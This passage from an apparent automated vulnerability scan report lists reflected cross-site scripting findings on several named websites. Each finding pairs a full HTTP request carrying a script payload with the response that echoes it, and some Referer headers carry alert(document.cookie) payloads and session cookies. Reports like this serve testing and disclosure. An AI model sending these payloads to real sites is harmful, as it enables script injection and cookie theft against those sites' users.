The value of the c request parameter is copied into the HTML document as plain text between tags. The payload c96be<script>alert(1)</script>92b20bf3bf8 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /auth/getToken?devId=ao1atoKNL9675h&attributes=displayName,profileUrl,pictureUrl&f=json&c=jsonp1297023979135c96be<script>alert(1)</script>92b20bf3bf8 HTTP/1.1
Host: api.screenname.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aolhealth.com/?efb95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2a680ac5448=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; bandType=broadband; s_pers=%20s_getnr%3D1297023688615-Repeat%7C1360095688615%3B%20s_nrgvo%3DRepeat%7C1360095688616%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:25:23 GMT
Set-Cookie: JSESSIONID=6A020E7511383C0E38BF9DB8FCE3D07B; Path=/auth
Set-Cookie: OASC=diAxLjAgayAwIHlaWi9nVVBheFN2ZUJHcFZEYUNtcjFUNVhkWT0%3D-SSQdmqasJXW7AratTMW0Ebo0fFONkRgKp3Nz8AP0G2hDlYt5hoCp0D9upWW2a1M1tALOCnjOZLBFwhvg5agWxYIVALonDKGqbQQsQOEEfCl4FW0AirWAhSnABCxmMQEil%2FSriE29mS1hitvGyQTxzNUbM7yoamEoiPR1QMeJ9Sf8QCgk%2FH84DuWWFf2GJBVS; Path=/; HTTPOnly
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 130

jsonp1297023979135c96be<script>alert(1)</script>92b20bf3bf8({"response": {"statusCode": 400, "statusText": "Invalid callback"}});

1.41. http://api.tweetmeme.com/url_info.jsonc [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /url_info.jsonc

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f3298<script>alert(1)</script>b6048824017 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url_info.jsonc?url=http%3A%2F%2Fwww.electronista.com%2Farticles%2F11%2F02%2F04%2Fsales.of.glasses.free.3d.tvs.weaker.than.expected%2F%3Fe4c13%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec3b351ab889%3D1&callback=aptureJsonCallback1f3298<script>alert(1)</script>b6048824017 HTTP/1.1
Host: api.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-724637325-1295907700201; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983; user_unique_ident=4d4300485cccb8.88856407-57c11f7a933564d3f62b1bb71b01e19d

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 06 Feb 2011 20:38:11 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-RateLimit-Limit: 400
X-RateLimit-Remaining: 374
X-Served-By: h04
Content-Length: 117

aptureJsonCallback1f3298<script>alert(1)</script>b6048824017({"status":"failure","comment":"unable to resolve URL"});

1.42. http://ar.voicefive.com/b/rc.pli [func parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload ac334<script>alert(1)</script>4007ecfe708 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractionac334<script>alert(1)</script>4007ecfe708&n=ar_int_p85001580&1297025046004 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000787354/mnum=0000967043/cstr=18771686=_4d4f07c5,5603181230,787354_967043_1183_0,1_/xsxdata=1:93218262/bnum=18771686/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SDYN_2011Q1/160/L32/671449763/x90/USNetwork/RS_SDYN_2011Q1_AOL_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1485203807/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1485203807?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; ar_da39f516a098b3de&#41; ar_p85001580=exp=44&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:42:50 2011&prad=58087444&arc=40461884&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1297024970%2E607%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Feb 2011 20:43:03 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteractionac334<script>alert(1)</script>4007ecfe708("");

1.43. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=160x600

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b311e"><script>alert(1)</script>70aa52fbe42 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframeb311e"><script>alert(1)</script>70aa52fbe42/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 367

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addynb311e"><script>alert(1)</script>70aa52fbe42/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844;adiframe=y">
...[SNIP]...

1.44. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=160x600

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0aea"><script>alert(1)</script>048f105caf6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0c0aea"><script>alert(1)</script>048f105caf6/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 367

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0c0aea"><script>alert(1)</script>048f105caf6/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844;adiframe=y">
...[SNIP]...

1.45. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=160x600

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ac20"><script>alert(1)</script>0456f182ac8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.16ac20"><script>alert(1)</script>0456f182ac8/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 367

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.16ac20"><script>alert(1)</script>0456f182ac8/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844;adiframe=y">
...[SNIP]...

1.46. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=160x600

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 309fa"><script>alert(1)</script>a95da17c31 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794309fa"><script>alert(1)</script>a95da17c31/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 366

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794309fa"><script>alert(1)</script>a95da17c31/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844;adiframe=y">
...[SNIP]...

1.47. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=160x600

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aa9b"><script>alert(1)</script>f586567e29c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/07aa9b"><script>alert(1)</script>f586567e29c/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 367

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/07aa9b"><script>alert(1)</script>f586567e29c/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844;adiframe=y">
...[SNIP]...

1.48. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=160x600

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c27e3"><script>alert(1)</script>773b6376821 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1c27e3"><script>alert(1)</script>773b6376821/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 367

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1c27e3"><script>alert(1)</script>773b6376821/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844;adiframe=y">
...[SNIP]...

1.49. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=160x600

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce70a"><script>alert(1)</script>735d74c1b51 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/sizece70a"><script>alert(1)</script>735d74c1b51=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 367

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/sizece70a"><script>alert(1)</script>735d74c1b51=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844;adiframe=y">
...[SNIP]...

1.50. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=160x600

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d167e"><script>alert(1)</script>5532f5945a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844&d167e"><script>alert(1)</script>5532f5945a4=1 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 370

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844&d167e"><script>alert(1)</script>5532f5945a4=1;adiframe=y">
...[SNIP]...

1.51. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [noperf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=160x600

Issue detail

The value of the noperf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6861"><script>alert(1)</script>ad0c3bcb1e7 was submitted in the noperf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844c6861"><script>alert(1)</script>ad0c3bcb1e7 HTTP/1.1
Host: at.atwola.com
